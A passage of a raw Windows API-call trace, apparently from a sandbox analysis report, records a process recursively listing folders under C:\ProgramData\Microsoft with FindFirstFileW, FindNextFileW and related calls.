lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa329a8 [0139.798] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.798] FindNextFileW (in: hFindFile=0xa329a8, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.798] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0139.798] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.798] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.798] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.798] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.799] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.799] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.799] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.799] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.812] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.812] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.812] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.812] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.813] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.813] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.813] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.813] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.813] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.813] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.813] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.813] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.813] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.813] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.813] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.813] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.813] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.814] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0139.814] FindNextFileW (in: hFindFile=0xa32a68, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.814] FindNextFileW (in: hFindFile=0xa32a68, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.815] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0139.816] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0139.816] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0139.816] FindNextFileW (in: hFindFile=0xa32a68, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.816] FindNextFileW (in: hFindFile=0xa32a68, lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 1 [0139.817] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0139.817] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0139.817] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.817] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.817] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.818] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0 [0139.818] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.818] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.818] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.819] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.819] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.819] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.819] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.819] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.819] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.819] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.819] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.819] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.819] FindNextFileW (in: hFindFile=0xa32928, lpFindFileData=0x253f720 | out: lpFindFileData=0x253f720) returned 1 [0139.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.819] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.819] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.820] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.820] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0 [0139.820] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.820] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.820] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.820] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.820] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.820] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.820] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.820] FindNextFileW (in: hFindFile=0xa32968, lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 1 [0139.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.821] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.821] FindNextFileW (in: hFindFile=0xa32a28, lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 1 [0139.821] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.821] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.822] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0139.822] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0139.822] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0139.822] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0139.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0139.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0139.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0139.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0139.928] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Config\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0139.928] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0139.929] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0139.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0139.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\GatherLogs\\SystemIndex\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32b28 [0139.930] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0139.930] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33600a0 | out: hHeap=0x20f0000) returned 1 [0139.930] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0139.930] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0139.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0139.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\*", lpFindFileData=0x253e808 | out: lpFindFileData=0x253e808) returned 0xa32b28 [0139.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32b68 [0139.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles\\*", lpFindFileData=0x253e300 | out: lpFindFileData=0x253e300) returned 0xa329a8 [0140.019] FindClose (in: hFindFile=0xa329a8 | out: hFindFile=0xa329a8) returned 1 [0140.020] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33800b0 | out: hHeap=0x20f0000) returned 1 [0140.021] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.021] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33700a8 | out: hHeap=0x20f0000) returned 1 [0140.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\PropMap\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32b68 [0140.021] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.021] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\*", lpFindFileData=0x253e584 | out: lpFindFileData=0x253e584) returned 0xa32b68 [0140.024] FindClose (in: hFindFile=0xa32b68 | out: hFindFile=0xa32b68) returned 1 [0140.024] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.024] FindClose (in: hFindFile=0xa32b28 | out: hFindFile=0xa32b28) returned 1 [0140.024] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33600a0 | out: hHeap=0x20f0000) returned 1 [0140.025] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.025] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3350098 | out: hHeap=0x20f0000) returned 1 [0140.029] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.029] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3340090 | out: hHeap=0x20f0000) returned 1 [0140.030] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.031] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.031] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.031] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.031] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.031] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.031] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.032] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.034] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.035] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.035] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.035] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.036] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.037] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\VISIO\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.037] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0140.037] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2257a60 | out: hHeap=0x20f0000) returned 1 [0140.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\*", lpFindFileData=0x253f49c | out: lpFindFileData=0x253f49c) returned 0xa32968 [0140.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\AIT\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.038] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.038] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.038] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.038] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataStore\\en-US\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.038] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.038] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.038] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.038] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\DRM\\Cache\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.039] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.039] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\GameExplorer\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.039] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.039] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.039] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.047] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.047] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.048] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.048] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Manifest\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.049] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.049] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Sessions\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.049] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.049] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Sqm\\Upload\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.049] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0140.049] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0140.049] FindClose (in: hFindFile=0xa32a28 | out: hFindFile=0xa32a28) returned 1 [0140.050] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0140.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x253f218 | out: lpFindFileData=0x253f218) returned 0xa32a28 [0140.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x253ef94 | out: lpFindFileData=0x253ef94) returned 0xa32a68 [0140.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0140.050] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.050] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0140.050] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Tablet PC\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0140.051] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\*", lpFindFileData=0x253ea8c | out: lpFindFileData=0x253ea8c) returned 0xa32ae8 [0140.051] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0140.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3330088 | out: hHeap=0x20f0000) returned 1 [0140.051] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.051] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.052] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.052] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x253ed10 | out: lpFindFileData=0x253ed10) returned 0xa32aa8 [0140.052] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0140.052] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3320080 | out: hHeap=0x20f0000) returned 1 [0140.052] FindFirstFileW (in: 